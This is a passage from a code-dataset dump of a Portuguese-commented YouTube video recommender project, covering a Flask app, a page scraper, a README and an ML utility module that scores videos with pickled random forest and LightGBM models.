diferença \n print(video_id, json.dumps(data_front))\n \n # depois ele joga tudo pro arquivo json, novos_videos.json, ele coloca um json por linha e esse vai ser nosso banco de dados dos ultimos videos que avaliamos. \n output.write(\"{}\\n\".format(json.dumps(data_front)))\n return True" }, { "alpha_fraction": 0.7266504168510437, "alphanum_fraction": 0.7331913709640503, "avg_line_length": 74.57471466064453, "blob_id": "f7c46ebc9a567b39efc3421cede5c13adc54c6f8", "content_id": "770b41a801d096252eebf2a326cc3dfceb298127", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 6660, "license_type": "no_license", "max_line_length": 661, "num_lines": 87, "path": "/4. 
Colocando em produção/app.py", "repo_name": "Jarbas-Jr/projetct-youtube-recommendation", "src_encoding": "UTF-8", "text": "# deploy_front/app.py\n\n\nimport os.path\nfrom flask import Flask\nimport os\nimport json\nimport run_backend\n\nimport time\n\n# criando esse app, pra criar o objeto flask pra que ele sirva as paginas pro servidor entender os comandos que ele vai receber.\napp = Flask(__name__)\n\n\n# Pode-se escolher um banco de dados mais sofisticados como SQlite ou seila, mas nesse caso pra deixar as coisas simples e claras, vamos usar um arquivo como banco de dados, como nao e o caso de precisar de senha, nao sao dados sigiliosos e tal, a gente pode colocar tudo num arquivo que nao da nada, é um prototipo, um arquivo bem simples.\n\n# Primeiro crio uma lista pra ele armazena os videos novos com as previsões.\n\n# crio esse arquivo \"novos_videos.json\", entao coloco: se não existir, se o arquivo que eu passei aqui nessa variavel nao existir, ele vai rodar uma função update.db que vai estar no run_backend e vai puxar esses videos pra gente e colocar nesse arquivo.\n\n# abrindo o arquivo \"novos_videos.json\", ele vai ter um json por linha e em cada um, o titulo, score(previsão do ensemble), e o video id que é o link para o video. E o uptade time, que é o horario que pegamos o video la do YT. Lista simples de varios json's.\n\n# Para pegar o last_update, usamos a função getmtime, que pega o momento em que o arquivo foi modificado pela ultima vez, e ele vai retornar isso em segundos desde 01-01-1970, e mario multiplica por 1e9, pq ele usa a unidade em nano segundos, ja que ele nos retorna em unidade de segundos, nao e necessario mas mario prefere usar em nano segundo.\n\n# depois tem um 'if': se o momento atual, quando alguem fez a requisição dessa pagina menos(-) for maior que 720 horas, ele vai falar: se faz mais de um mês, FAÇA A ATUALIZAÇÃO DO BANCO DE DADOS. Que é através do update_db. \n\n# PQ UM MÊS ? Nem toda semana ou mês vao ter videos interessantes, entao e desnecessario atualizar com uma frequencia maior. Poderia ser até mais que um mês, mas vamos deixar assim.\n\n# Na parte do 'with open' ja temos o arquivo salvo no disco do servidor, agora vamos ler esse arquivo, pegar cada json e colocar naquela lista videos criada no inicio da função.\n\n# Agora vamos iterar pela lista de videos e criar outra lista, a de previsões. Pq isso? Pq eu nao quero que ele me mostre todos os videos, ficaria uma pagina muito grande. Vou usar a função sorted pra ele poder rankear do video mais interessante pro menos interessante e so retornar pra mim os 30 mais interessantes. \ndef get_predictions():\n\n videos = []\n \n novos_videos_json = \"novos_videos.json\"\n if not os.path.exists(novos_videos_json):\n run_backend.update_db()\n \n last_update = os.path.getmtime(novos_videos_json) * 1e9\n\n #if time.time_ns() - last_update > (720*3600*1e9): # aprox. 1 mes\n # run_backend.update_db()\n\n with open(\"novos_videos.json\", 'r') as data_file:\n for line in data_file:\n line_json = json.loads(line)\n videos.append(line_json)\n\n predictions = []\n for video in videos:\n # depois que cria a lista de tuples\n predictions.append((video['video_id'], video['title'], float(video['score'])))\n # aplico a função sorted, usar a função no key, vai pegar o ultimo elemento(score) e vai ordenar de trás pra frente, do maior pro menor essa lista, e vou pegar o 30 primeiros\n predictions = sorted(predictions, key=lambda x: x[2], reverse=True)[:30]\n\n # agora vou iterar, so que ppr essa lista. 
E nessa lista vou colcoar o código HTML pra cada um dos videos que estão nessa lista de predictions, temos um HTML muito simples que criar uma tag com hiperlink pra cada video, e coloca nessas th e tr que são as tags pra organizar a tabela, e coloca a score tbm. Isso é o codigo de cada um dos videos que temos na pagina do app. \n predictions_formatted = []\n for e in predictions:\n #print(e)\n predictions_formatted.append(\"<tr><th><a href=\\\"{link}\\\">{title}</a></th><th>{score}</th></tr>\".format(title=e[1], link=e[0], score=e[2]))\n \n # no fim eu preciso dar um 'join' nessa lista e colocar uma linha, eu coloco cada item dessa lista numa nova linha pra ele formatar corretamente a tabela. É possivel ver isso mais claro no codigo fonte da pagina do app.\n # Daqui o get_prediction vai pro main_page e o resto ta explicado la.\n return '\\n'.join(predictions_formatted), last_update\n\n\n\n# Pra indicar pro flask pra onde ele tem que indicar uma requisição, temos que usar o 'decorator' do python, nao precisa entender mas é uma função que colocamos com \"@\", ela vai pegar a função abaixo, no caso main_page, e vai aceita-la como argumento pra poder fazer alguns processos internos. Dentro do parenteses temos que colocar qual vai ser a requisição que vai chamar essa função \"('/')\", então o que estamos falando é: quando fizerem a requisição pra '/', pro diretorio raiz do nosso dominio, aplicação, retornamos o resultado dessa função. Quando acessarmos o endereço passado do heroku onde o app está hospedado, vamos receber o resultado dessa função.\n\n# Essa função faz basicamente duas coisa: ela vai rodar a função get_predictions e vai receber as previsões relativamente formatas e o momento em que foi rodado o 'last_update', o momento em que ele buscou pela ultima vez os videos no YT. Pq? Pq precisamos ir la no YT buscar os videos novos que foram postados pra gente fazer as previsões e eu quero guardar esse las_update pra guardar aqui na pagina quando retornar.\[email protected]('/')\n# Ao rodar essa função ele está retornando uma string com código HTML e um cabeçallho com \"Recomendador de Vídeos do Youtube\", e ai no corpo ele coloca os segundos desde a ultima atualização, através do last_update. E na tabela ele vai colocar o pred que é uma string muuuito grande, onde ele coloca cada video dentro de uma tabela pra ficar razoalvemente formatada. Coloca o titulo, o score que o modelo de ensemble deu pra esse video, e tambem o link que nos leva para o video. \ndef main_page():\n preds, last_update = get_predictions()\n return \"\"\"<head><h1>Recomendador de Vídeos do Youtube</h1></head>\n <body>\n Segundos desde a última atualização: {}\n <table>\n {}\n </table>\n </body>\"\"\".format((time.time_ns() - last_update) / 1e9, preds)\n\n# pro flask rodar precisamos colcoar isso \"if __name__ == '__main__':\" que é coisa comum do python pra rodar scripts, e em geral para apps de produção nao se coloca debug=True se nao vai ficar debugando ele. 
E o host que é o ip dentro da maquina onde vai rodar essa aplicação.\nif __name__ == '__main__':\n app.run(debug=True, host='0.0.0.0')" }, { "alpha_fraction": 0.6871165633201599, "alphanum_fraction": 0.7177914381027222, "avg_line_length": 37.35293960571289, "blob_id": "dd45c7fb8b980d000fec35e29730e7cea227049e", "content_id": "b497946604ff3363a1ca5277318f49dc9a673ccd", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 662, "license_type": "no_license", "max_line_length": 118, "num_lines": 17, "path": "/README.md", "repo_name": "Jarbas-Jr/projetct-youtube-recommendation", "src_encoding": "UTF-8", "text": "<p align=\"center\">\n <img src=\"jarbasjr.jpeg\" >\n</p>\n\n# Jarbas Carriconde\n<sub>*Data Science & Machine Learning - Engenheiro de Automação pela Univerisdade Federal do Rio Grande - FURG*</sub>\n\n**[LinkedIn](https://www.linkedin.com/in/jarbas-carriconde-4877b9151/)**\n\nSeguem as pastas com os notebooks comentados, sobre todas as etapas de um projeto que **Recomenda Vídeos no Youtube**,\ndesde as hipóteses de negócios até a etapa de colocar em produção:\n\n\n* **1.Definindo o problema**: https://bit.ly/2YVKMR9\n* **2.Preparando os Dados**: https://bit.ly/37MuSN5\n* **3.Criando o Modelo**: https://bit.ly/3elr9bC\n* **4.Colocando em produção**: https://bit.ly/2NhQSWv\n" }, { "alpha_fraction": 0.6697960495948792, "alphanum_fraction": 0.6727096438407898, "avg_line_length": 35.35293960571289, "blob_id": "7fc91651276e8997158b40d77aad1c9ed4334fe9", "content_id": "53785bac99aa3117f22f78789c0d231c691ec497", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3109, "license_type": "no_license", "max_line_length": 392, "num_lines": 85, "path": "/4. Colocando em produção/get_data.py", "repo_name": "Jarbas-Jr/projetct-youtube-recommendation", "src_encoding": "UTF-8", "text": "import requests as rq\nimport bs4 as bs4\nimport re\nimport time\n\n\n# Esse simplesmente pegar e retorna o código fonte da pagina, response.text que a gente passa para o beatiful soup, o bs4.\n\ndef download_search_page(query, page):\n url = \"https://www.youtube.com/results?search_query={query}&sp=CAI%253D&p={page}\"\n urll = url.format(query=query, page=page)\n #print(urll)\n response = rq.get(urll)\n \n return response.text\n\n\n# faz a mesma coisa, só que com a pagina do video, exatamente como lá no notebook de coleta.\n\ndef download_video_page(link):\n url = \"https://www.youtube.com{link}\"\n urll = url.format(link=link)\n response = rq.get(urll)\n \n link_name = re.search(\"v=(.*)\", link).group(1)\n\n return response.text\n\n# Mesma coisa dos primeiros notebooks de coletas, a gente vai pegar o beatifulsoup, pegar as tags. Se tiver duvida retornar la nos notebooks de coleta. Só que ao invés de guardar no arquivo parsed_videos.json, vamos pegar os dados e adicionar em video_list pq vamos retornar essa lista la pro run_backend. Essa video_list é resultado dessa função que pega os links dos videos.\n\ndef parse_search_page(page_html):\n parsed = bs4.BeautifulSoup(page_html)\n\n tags = parsed.findAll(\"a\")\n\n video_list = []\n\n for e in tags:\n if e.has_attr(\"aria-describedby\"):\n link = e['href']\n title = e['title']\n data = {\"link\": link, \"title\": title}\n video_list.append(data)\n return video_list\n\n\n# Esse é o mais complicadinho, se tiver dúvida voltar la nos primeiros notebooks de coleta. 
Ao invés de salvar no arquivo a gente retorna o proprio dicionarios que criamos com todas as informações. Mandamos todos os dados mesmo, de forma bem bruta, mesmo que nao utilizemos todos, pq depois se for necessario novos testes e criação de features, nao precisarmos vir aqui de novo e mudar tudo. \n\ndef parse_video_page(page_html):\n parsed = bs4.BeautifulSoup(page_html, 'html.parser')\n\n class_watch = parsed.find_all(attrs={\"class\":re.compile(r\"watch\")})\n id_watch = parsed.find_all(attrs={\"id\":re.compile(r\"watch\")})\n channel = parsed.find_all(\"a\", attrs={\"href\":re.compile(r\"channel\")})\n meta = parsed.find_all(\"meta\")\n\n data = dict()\n\n for e in class_watch:\n colname = \"_\".join(e['class'])\n if \"clearfix\" in colname:\n continue\n data[colname] = e.text.strip()\n\n for e in id_watch:\n colname = e['id']\n #if colname in output:\n # print(colname)\n data[colname] = e.text.strip()\n\n for e in meta:\n colname = e.get('property')\n if colname is not None:\n data[colname] = e['content']\n\n for link_num, e in enumerate(channel):\n data[\"channel_link_{}\".format(link_num)] = e['href']\n\n\n return data\n\n\n\n\n# Não tem muito segredo colocar em produção essa parte de processamento de dados, e pegar o codigo que utilizamos pra puxar os codigos que usamos pra coletar/puxar os dados originalmente de algum banco de dados e transformar em funções que possamos usar pra rodar um exemplo de cada vez." }, { "alpha_fraction": 0.7220183610916138, "alphanum_fraction": 0.7280734181404114, "avg_line_length": 74.64583587646484, "blob_id": "1a98b535a98fa4654cfaa8d100ba2658293218af", "content_id": "0f10335a273a390f3fc9aa0fbdd1af1c7e3567d9", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 11039, "license_type": "no_license", "max_line_length": 929, "num_lines": 144, "path": "/4. Colocando em produção/ml_utils.py", "repo_name": "Jarbas-Jr/projetct-youtube-recommendation", "src_encoding": "UTF-8", "text": "import pandas as pd\nimport re\nimport joblib as jb\nfrom scipy.sparse import hstack, csr_matrix\nimport numpy as np\nimport json\n\n# Aqui vamos ver muita coisa que também não será novidade.\n\n# processar as datas da mesma maneira que fizemos na coleta de dados\nmapa_meses = {\"jan\": \"Jan\",\n \"fev\": \"Feb\",\n \"mar\": \"Mar\", \n \"abr\": \"Apr\", \n \"mai\": \"May\", \n \"jun\": \"Jun\",\n \"jul\": \"Jul\",\n \"ago\": \"Aug\", \n \"set\": \"Sep\", \n \"out\": \"Oct\", \n \"nov\": \"Nov\",\n \"dez\": \"Dec\"}\n\n\n# aqui temos uma diferença, aqui carregamos os modelos, no formato pkl.z, seria a mesma coisa que estivessemos treinando e fazendo as previsões do modelo aqui. Geralmente a gente ta acostumado nos cursos e no kaggle, que ta tudo em um notebook só: treinamento e previsão. Nesse caso a gente ta pegando como se a gente tivesse parado na parte de treinamento e agora a gente pode usar isso pra fazer a previsão. Carregando isso aqui estamos carregando o objeto do modelo exatamente como estava na hora que salvamos. POr isso e importante saber as versões de bibliotecas que estamos usando pra informar pro app pra nao ter problemas de compatibilidades, vamos ver isso em breve. \n# Criamos propositalmente fora de todas as funções pra que eles possam ser acessados por qualquer função necessaria, apesar que a gente so vai usa-los em uma função e poderiam ser carregados na função especifica. Outra vantagem é que eles ja ficam na memoria, entao se for um modelo muito pesado de carregar, so precisamos carregar uma vez. 
\nmdl_rf = jb.load(\"random_forest_20200208.pkl.z\")\nmdl_lgbm = jb.load(\"lgbm_20200208.pkl.z\")\ntitle_vec = jb.load(\"title_vectorizer_20200208.pkl.z\")\n\n\n\n# clean_date, mesma limpeza que fizemos, so que agora precisamos mudar algumas coisas pq nao temos o pandas. Emtão pra facilitar bastante a nossa vida, criamos as funções recebendo o dicionario inteiro de dados, com as informações e so pegando aquilo que é necessario pra fazer essa função. \n\n# Aqui vamos usar a biblioteca de expressões regulares do python pra achar a mesma expressão regular que usamos com a função do pandas la na hora de limpar pra fazer o modelo, se não achar nada, ele retorna NaN. Se deu NaN e nao achou data, isso é um sinal que há problema com essa pagina, logo a gente nao deve fazer previsão pra essa pagina pois nao tem as info necessarias.\n\ndef clean_date(data):\n if re.search(r\"(\\d+) de ([a-z]+)\\. de (\\d+)\", data['watch-time-text']) is None:\n return None\n \n # Aqui, quando rodamos raw_date_str_list, ele retorna os grupos de captura da expressão regular, no caso dia, mês e ano. \n raw_date_str_list = list(re.search(r\"(\\d+) de ([a-z]+)\\. de (\\d+)\", data['watch-time-text']).groups())\n #print(raw_date_str_list)\n # E aqui vamos ver que: devemos lembrar que no momento da modelagem deviamos adicionar um '0' na frente de numeros do dia que tivessem um digito, pra que o pandas entedesse que era uma data pro pandas formatar e trasnformar em um objeto data. Aqui estamos fazendo a mesma coisa, se o primeiro elemento que é o dia tiver tamanho 1, adiciona um 0 na frete.\n if len(raw_date_str_list[0]) == 1:\n raw_date_str_list[0] = \"0\"+raw_date_str_list[0]\n\n # Mesma coisa na hora de processar os meses, to pegando o elemento 1, que se refere aos meses: 0 é dia, 1 é mês e 2 é ano. E entao aplicamos o mapa meses, vai estar a abreviação de meses em portugues, e aplicamos o mapa para trocar para como o pandas espera o mês.\n raw_date_str_list[1] = mapa_meses[raw_date_str_list[1]]\n \n # Precisamos transformar tudo isso em uma string pra passar pra função to_datetime, e juntamos os elementos por espaço. E transformamos tudo em uma string.\n clean_date_str = \" \".join(raw_date_str_list)\n\n # e ele retorna o o objeto datetime, para que possamos manipular.\n return pd.to_datetime(clean_date_str, format=\"%d %b %Y\")\n\n\n\n# Agora vamos limpar o campo de visualizações, novamente estamos usando a biblioteca de expressão regular do python pra achar o numero que queremos nesse campo 'watch-view-count', se for NaN, é nesse caso queremos retornar que tem 0 visualização o video. \ndef clean_views(data):\n raw_views_str = re.match(r\"(\\d+\\.?\\d*)\", data['watch-view-count'])\n if raw_views_str is None:\n return 0\n # Aqui no raw_views_str, to pegando o group 1, que é o group de captura, se pegar o group 0, ele pega a expressão inteira, que da na mesma, mas em geral não da na mesma. E fazemos o replace do '.' 
por nada, pq o python precisa entender que esses numeros estão na casa de milhares, mas esse ponto seria como uma virgula.\n raw_views_str = raw_views_str.group(1).replace(\".\", \"\")\n #print(raw_views_str)\n\n # e então retorna os valores 'int' de visualizações.\n return int(raw_views_str)\n\n\n# FUNÇÃO IMPORTANTE, novamente, mario fez o maximo possivel pra pegar o dicionario inteiro e definindo dentro da função o que vamos usar.\ndef compute_features(data):\n \n # Se não tem esse campo, significa que deu algum problema.\n if 'watch-view-count' not in data:\n return None\n \n # pegamos a data da publicação e fazemos o 'clean_date', processo mostrado na função acima. Se não achar esse campo ele retorna none, e vai pular esse exemplo, nao vamos fazer previsão pq nao temos informação necessaria. \n publish_date = clean_date(data)\n if publish_date is None:\n return None\n\n # views vai ser o numero inteiro de visualizações que vamos retornar com a função clean views, seja ele 0 ou maior que 0.\n views = clean_views(data)\n \n # O titulo vai ser watch-title.\n title = data['watch-title']\n \n # mario gosta de criar features como dicionario, pq posso, mesmo aqui podemos acessa-las pelo nome, e fica mais facil de ordenar, nao cometer erros bobos, como inverter a ordem das features.\n features = dict()\n \n # mesma coisa que fizemos nos notebooks de modelos, a diferença é que vamos pegar o dia de hoje menos a data de publicação. Não podemos colocar a data fixa que colocamos na modelagem, mas precisamos de numero positivos pq o modelo desconhece numero negativo, se colocarmos a mesma data de lá, ele vai ter numero negativos, pq ele foi publicado depois da data fixa e o modelo nao saberá o que fazer com eles. Esse é uma das questões que em produção muda um pouco como computamos a feature. E temos que ver se o modelo sobrevive a isso, nesse caso vai pq nao estamos usando diretamente essa feature, mas como uma medida de popularidade na hora de fazer a feature de views por dia, onde deve-se dividir as views pela quantidade de dias que está publicado. Tanto que deleto o tempo desde a publicação desse dicionario. Então até aqui computamos duas features numericas, views e views por dia. Essa função é aplicada a cada video.\n features['tempo_desde_pub'] = (pd.Timestamp.today() - publish_date) / np.timedelta64(1, 'D')\n features['views'] = views\n features['views_por_dia'] = features['views'] / features['tempo_desde_pub']\n del features['tempo_desde_pub']\n\n # hora de transformar o titulo em vetor, pegar o title_vec que é o vetorizaror tf-idf e passar uma lista com essa string do titulo. Se passar só a string ele nao vai entender, entao precisamos passar pra função uma lista contendo o elemento que é o titulo, titulo no caso só a string do nome do video. \n vectorized_title = title_vec.transform([title])\n\n # ele retorna pra gente uma matriz csr, é um tipo de matriz esparsa. \n #E estamos transformando em csr matrix uma array do numpy que contém os dois elementos de features, essas precisam ser as duas primeiras pois era assim quando treinamos na modelagem.\n num_features = csr_matrix(np.array([features['views'], features['views_por_dia']]))\n # agora usamos aquela função do scipy pra juntar as features numericas com a matriz de contagem de palavras do titulo.\n feature_array = hstack([num_features, vectorized_title])\n\n # e retornamos essa feature_array, é uma array gigante de 1 x numero de colunas, mesma coisa que pegar uma linha da matriz que usamos pra treinar ou validar o modelo. 
Não tem segredo passar informações novas pro modelo. A parte mais chata é computar, processar, limpar todas as informações para colocar no formato de feature que precisamos. \n return feature_array\n\n\n# Essa função usamos la em run_backend, ela vai chamar o compute_features com o 'data', aquele dicionario gigante de informações, ele retorna a 'feature_array' que vimos acima. Se a feature_array, for NaN, ele vai retornar 0 : não tem previsão pra esse video.\ndef compute_prediction(data):\n feature_array = compute_features(data)\n\n if feature_array is None:\n return 0\n\n # retorna probabilidade do video ser bom ou ruim. E passamos feature_array, passamos uma matriz esparsa de 1 pelo numero de colunas, e ele retorna uma array bidimensional, então selecionamos a linha 0 e o elemento 1, que é a probabilidade de ser da classa positiva. Quando usamos funções que seguem a API do sckit-learn, ele vai retornar a probabilidade de ser classe 0 e a proba de ser da classe 1 , por isso que tem esse [0] e [1] no final. \n p_rf = mdl_rf.predict_proba(feature_array)[0][1]\n p_lgbm = mdl_lgbm.predict_proba(feature_array)[0][1]\n\n # ensemble dos dois modelos, random forest e lgbm. \n p = 0.5*p_rf + 0.5*p_lgbm\n \n # essa log_data serviria pra gente fazer monitoramento do modelo em produção, precisamos sempre monitorar pra ver se ele ta recebendo os valores corretos e tal. COmo isso é um protótipo, nao teremos essa parte de monitoramento.\n # Mas o que eu salvo nesse 'log_data' ? salvo os dados originais, feature_array e a previsão. IR PRA FUNÇÃO 'log_data' ABAIXO PRA VER.\n \n #log_data(data, feature_array, p)\n\n return p\n\ndef log_data(data, feature_array, p):\n# vamos aumentar o dicionario 'data', vamos colocar um campo com a previsão e outro com a feature_array, para que possamos ver se por alguma incompatibilidade o meu modelo começar a computar as features erradas, apesar das informações originais estarem corretas, vamos poder olhar essa 'feature_array' e ver um baita vetor onde vamos saber que ta acontecendo alguma coisa errada, conseguir detectar em que ponto que ele começou a prever errado. Armazendo como uma lista pra nao dar conflitos quando transforma pra json.\n\n# e a previsão tbm, pra ver historicamente se o modelo esta tendo 'auc' e 'ap' que esperamos, se as previsões estão no intervalo que eu espero. MAS NÃO VAMOS USAR AQUI.\n\n #print(data)\n video_id = data.get('og:video:url', '')\n data['prediction'] = p\n data['feature_array'] = feature_array.todense().tolist()\n \n # aqui a ideia era que armazenar ou em um arquivo ou banco de dados, e que cada chave video_id teria os dados relacionados a ele, que coletamos sobre ele. \n #print(video_id, json.dumps(data))\n\n\n\n\n\n\n\n" } ]
7
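For reference, the feature assembly the record above walks through (two numeric columns stacked in front of a TF-IDF title matrix) can be reproduced in isolation. A minimal sketch, assuming a fitted scikit-learn TfidfVectorizer stands in for the record's title_vec; the titles and counts here are invented:

import numpy as np
from scipy.sparse import csr_matrix, hstack
from sklearn.feature_extraction.text import TfidfVectorizer

# Hypothetical vectorizer playing the role of the record's title_vec.
title_vec = TfidfVectorizer()
title_vec.fit(["how to deploy a model", "feature engineering for beginners"])

views, views_per_day = 12000, 40.0  # assumed example values
num_features = csr_matrix(np.array([[views, views_per_day]]))  # numeric columns first
title_matrix = title_vec.transform(["how to deploy a model"])

feature_array = hstack([num_features, title_matrix])  # 1 x (2 + vocabulary size)
print(feature_array.shape)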
DRoss56/MyFirstRepo
https://github.com/DRoss56/MyFirstRepo
7104b9d8afe998e878f53752e07548576ca5b604
09c504d577f37232d2836cccf7edcca1fcba4829
5e608830f46a12757a2a9dda2b622356332659e6
refs/heads/master
2021-05-07T00:26:38.901910
2018-05-14T15:53:34
2018-05-14T15:53:34
110,143,206
0
1
null
null
null
null
null
[ { "alpha_fraction": 0.6014235019683838, "alphanum_fraction": 0.6014235019683838, "avg_line_length": 18.071428298950195, "blob_id": "d8523f67a469a0d2c11d36955f5f59f8f4d50337", "content_id": "6ed643d92404c6ee19d2cc05a54d4f25d7e8d72a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 281, "license_type": "no_license", "max_line_length": 48, "num_lines": 14, "path": "/Personality_PAPA.py", "repo_name": "DRoss56/MyFirstRepo", "src_encoding": "UTF-8", "text": "name = \" Dashiell\"\r\nstate = \"Texas\"\r\ntvshow = \" The Office\"\r\n\r\nprint (name + \" likes to watch\" + tvshow)\r\n\r\n\r\nprint (\"Whats your favorite subject?\")\r\nsubject = input()\r\n\r\nif subject == \"History\":\r\n print (\"Thats right\")\r\nelse:\r\n print (subject + \"is the wrong subject\")\r\n" }, { "alpha_fraction": 0.5616180896759033, "alphanum_fraction": 0.5738475918769836, "avg_line_length": 24.575000762939453, "blob_id": "d3b320f24919c14ded0417eeba56312153db4c43", "content_id": "eb479834950ddbb7d13b3d4a0a2e81b9c9c241dd", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1063, "license_type": "no_license", "max_line_length": 134, "num_lines": 40, "path": "/guesswordDR.py", "repo_name": "DRoss56/MyFirstRepo", "src_encoding": "UTF-8", "text": "import random\r\n\r\nwords = [\"intricate\",\"i cup\",\"innovitation\",\"vsauce\"]\r\n\r\nhint1 = [\"The best word\",\"if apple made a cup\",\"the future, what drives the world\",\"hey ______ Michael here\"]\r\n\r\nhint2 = [\"I always love to say it \",\"what you see with and what you drink out of\",\"flows like a river\",\"A great source of spit facts\"]\r\n\r\nnumber = random.randint(0,3)\r\n\r\nsecretword = words[number]\r\n\r\nguess = \"\"\r\n\r\ncounter = 0\r\n\r\nwhile True:\r\n print(\"Guess the best word\")\r\n print(\"Type 'hint1', 'hint2', 'firstletter', 'lastletter', or 'give up' for help.\")\r\n guess = input()\r\n counter += 1\r\n if guess == secretword:\r\n print (\"You are correct? 
It took you \" + str(counter) + \" guesses.\")\r\n break\r\n\r\n elif guess == \"hint1\":\r\n print( hint1[number] )\r\n\r\n\r\n print( hint2[number] )\r\n\r\n elif guess == \"first letter\":\r\n print ( secretword[0] )\r\n\r\n elif guess == \"last letter\":\r\n print ( secretword[-1] )\r\n\r\n elif guess == \"give up\":\r\n print (\"One of the best words is \" + secretword )\r\n break\r\n" }, { "alpha_fraction": 0.5505449175834656, "alphanum_fraction": 0.6309658288955688, "avg_line_length": 19.81147575378418, "blob_id": "69664aff0593d29b28d34d4ba1f99dfb4376439e", "content_id": "3b2e59b5796abe73a66e6fda297d2f3136632391", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2661, "license_type": "no_license", "max_line_length": 348, "num_lines": 122, "path": "/PG quiz Dash Ross.py", "repo_name": "DRoss56/MyFirstRepo", "src_encoding": "UTF-8", "text": "import pyautogui as pg\r\nimport time\r\nimport webbrowser\r\npoints = 0\r\n\r\n#Question\r\nanswer = pg.prompt(\r\n\"\"\"\r\nHow do you spend most saterdays?\r\n\r\na)With the boys\r\nb)Doing mathematics\r\nc)Gaming\r\nd)Sports\r\n\r\n\"\"\"\r\n )\r\n\r\n#Give points\r\nif answer == \"a\":\r\n points +=1\r\nelif answer == \"b\":\r\n points +=2\r\nelif answer == \"d\":\r\n points +=3\r\nelif answer == \"c\":\r\n points +=4\r\n\r\n#Question\r\nanswer = pg.prompt(\r\n\"\"\"\r\nIn which situation is it okay to cry?\r\n\r\na)When you are sad\r\nb)At the Grand Canyon\r\nc)When you are shot\r\nd)None of the above\r\n\r\n\"\"\"\r\n )\r\n\r\n#Give points\r\nif answer == \"a\":\r\n points +=4\r\nelif answer == \"b\":\r\n points +=1\r\nelif answer == \"d\":\r\n points +=2\r\nelif answer == \"c\":\r\n points +=3\r\n\r\n\r\n\r\n#Question\r\nanswer = pg.prompt(\r\n\"\"\"\r\nHow many Fortnight wins do you have?\r\n\r\na)0\r\nb)1\r\nc)2\r\nd)3+\r\n\r\n\r\n\r\n\"\"\"\r\n )\r\n\r\n#Give points\r\nif answer == \"a\":\r\n points +=4\r\nelif answer == \"b\":\r\n points +=3\r\nelif answer == \"d\":\r\n points +=1\r\nelif answer == \"c\":\r\n points +=2\r\n\r\n\r\n#Question\r\nanswer = pg.prompt(\r\n\"\"\"\r\nWhat role do you play in the social heirarchy?\r\n\r\na)Nerd\r\nb)Jock\r\nc)Dominant Male\r\nd)Scholar\r\n\"\"\"\r\n )\r\n\r\n#Give points\r\nif answer == \"a\":\r\n points +=4\r\nelif answer == \"b\":\r\n points +=2\r\nelif answer == \"d\":\r\n points +=3\r\nelif answer == \"c\":\r\n points +=1\r\n\r\n\r\n# END OF SURVEY\r\n\r\npg.alert(\"Wow \")\r\n\r\n# it must be Dashiell because you are a cool cat\r\nif points <= 4:\r\n pg.alert(\"it must be Dashiell because you are a cool cat\")\r\n webbrowser.open(\"https://www.google.com/search?rlz=1C1GCEA_enUS752US752&biw=1366&bih=637&tbm=isch&sa=1&ei=XE9vWqGYCJKR_QbPp5rYDg&q=cool+club+penguin&oq=cool+club+penguin&gs_l=psy-ab.3..0l4j0i30k1j0i8i30k1j0i24k1l2.27862.30678.0.31043.17.17.0.0.0.0.88.966.17.17.0....0...1c.1.64.psy-ab..0.17.962...0i67k1.0.NuTVNZcmZ_g#imgrc=g5nLA4zZ8AI1QM:\")\r\n# Somewhat cool\r\nif points <= 8 and points > 4:\r\n pg.alert(\"You are pretty cool, not quite a cool cat\")\r\n webbrowser.open (\"https://www.youtube.com/watch?v=TcWPiHjIExA\")\r\n# Not cool\r\nif points > 8 and points < 12:\r\n pg.alert(\"Sorry but you just dont have the cool factor to you, try to take your cool pills daily\")\r\n webbrowser.open (\"https://www.youtube.com/watch?v=TcWPiHjIExA\")\r\n# Nerd\r\nif points > 12:\r\n pg.alert(\"You aren't cool at all you nerdface jk just take more cool pills\")\r\n webbrowser.open 
(\"https://www.google.com/search?rlz=1C1GCEA_enUS752US752&biw=1366&bih=637&tbm=isch&sa=1&ei=0E9vWs-9E4-zggeXzq_4CA&q=h3+h3+cool&oq=h3+h3+cool&gs_l=psy-ab.3...12944.18738.0.19010.19.13.4.2.4.0.78.692.13.13.0....0...1c.1.64.psy-ab..0.17.605...0j0i67k1j0i10k1j0i13k1j0i13i30k1.0.YvatKkwjCjU#imgrc=DdiTPoO3lB6ITM:\")\r\n" }, { "alpha_fraction": 0.55078125, "alphanum_fraction": 0.568359375, "avg_line_length": 15.066666603088379, "blob_id": "e74c262a00e86c554156957960a6399073326ef8", "content_id": "9ea787b5f1f414ad8f4a1482ac84a2f2344c82a5", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 512, "license_type": "no_license", "max_line_length": 141, "num_lines": 30, "path": "/MadLIBS.py", "repo_name": "DRoss56/MyFirstRepo", "src_encoding": "UTF-8", "text": "import time\r\n\r\nprint (\"Write a person\")\r\nname1 = input()\r\n\r\nprint(\"Write an action verb\")\r\naction = input()\r\n\r\nprint(\"Write a noun\")\r\nnoun = input()\r\n\r\nprint(\"Write an adjective\")\r\nadj = input()\r\n\r\nprint(\"Write a kind of body part\")\r\nbodypart1 = input()\r\n\r\nprint(\"Write a feeling\")\r\ninjury1 = input()\r\n\r\n\r\nanswer = input ()\r\n\r\n\r\n### MAD LIB ###\r\n\r\nprint (\"Whenever \" + name1 + \" \"+ action + \" at \" + noun + \" \" + \"They get \" + \" \" + adj + \" \" + bodypart1 + \" Which makes them \" + injury1)\r\n\r\n\r\ntime.sleep(100)\r\n" } ]
4
mwickram/LC101_Web_Caesar
https://github.com/mwickram/LC101_Web_Caesar
62bc5432ee88807642d4c22616a0c35bb73dacd8
27e25ffb9792ce75b926f3ebdaad5b1b7978c45f
0c74aa03e16b698a4dd9a57e01d318d9235af17c
refs/heads/master
2021-01-22T04:49:43.687924
2017-02-10T17:27:02
2017-02-10T17:27:02
81,588,774
0
0
null
null
null
null
null
